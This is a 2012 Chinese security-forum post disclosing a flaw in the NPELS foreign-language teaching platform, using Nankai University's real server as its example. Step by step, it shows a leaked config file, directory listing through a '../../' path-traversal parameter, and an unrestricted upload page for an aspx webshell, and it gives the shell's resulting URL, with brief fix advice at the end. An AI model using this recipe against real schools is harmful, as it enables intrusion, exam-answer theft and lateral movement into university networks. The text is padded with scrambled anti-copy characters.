找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2166|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中$ Z; P; f* @; s4 z: ~, |
  \6 t  `& g9 o- a# i4 ^' A, h$ ]
详细说明:/ c6 ?- K) }4 \# {& J
4 z* W8 ?- A8 L  g! r- x% ]
以南开大学的为例:   x) e! `/ r; J7 t8 K2 S
http://222.30.60.3/NPELS
5 P' O; _4 i( y  a6 f9 \NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
# F5 j- {* r3 s, a  F7 Q4 o3 X: z( f<setting name="Update_CommonSvr_CommonService" serializeAs="String">$ c0 [# {1 {$ d3 {
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
' `. O, `3 o- A% ^</setting>7 r* H8 R& e6 V
及版本号: R7 E! w$ ]; H
<add key="TVersion" value="1, 0, 0, 2187">1 X' B; @: W! R# d6 ]+ m
</add>
0 m$ Q5 D# M9 M; G- _+ u  @% E0 v直接访问
, i9 U5 B% B/ V" Nhttp://222.30.60.3/NPELS/CommonService.asmx* {5 c8 |3 U1 @
使用GetTestClientFileList操作,直接 HTTP GET 列目录:/ j0 s& c) v8 F3 i4 B) J; `2 q1 \
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
  s* A- N2 H) ^) X2 X% C& D- `: g' S进一步列目录(返回的网页很大,可以直接 wget 下来)
- o4 d6 z9 U0 h+ Z  Vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../1 F- _/ t# q, c
+ p* _$ b% g& b& y5 E
发现
' b/ |7 U9 P! Y& h9 f0 s- E! t8 Phttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm' M' v# _0 c4 w9 V; a2 h; g- ?$ w
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头- `& c- }$ W2 p3 O5 i0 p6 }+ Z+ U
上传后继续列目录找到木马地址直接访问即可# _4 F% e. `1 {. @4 Q
/ T3 Z, a% T( n- j
OOXX% n& `! X* B1 I) I1 w4 ~) s0 G+ ]
9 U& c+ q7 m" L. t' D
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法; I6 ^& P, N# H7 @9 m
漏洞证明:: g0 b& H9 U* `  K: h9 @

3 i; H, X& p  S1 f列目录:* u" t; L" D# |. r$ O0 B! \! }
http://222.30.60.3/NPELS/CommonS ... List?version=../../  q1 H5 @3 h5 m) c) H: O1 q. _
文件上传:* G" c# W7 S4 q
http://222.30.60.3/npelsv/editor/editor.htm* i2 k' V- Z- v2 ]( {( }9 e
1 a' T! g' t! [
上传木马:% }+ o+ b( ?+ ]. B0 t. ^8 X4 M1 h
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx! u. }# o, e4 C; p, H0 D+ A

; q! I8 @! _: N修复方案:: _- m( {% B+ d& W, s& J
好像考试系统必须使用 CommonService.asmx5 T4 w  F/ \( d. g9 a% h/ L4 }
最好配置文件加密或者用别的方式不让它泄露出来
0 v! h# q% ]) ?! @0 ^并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
) G$ n1 v2 v& S/ E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表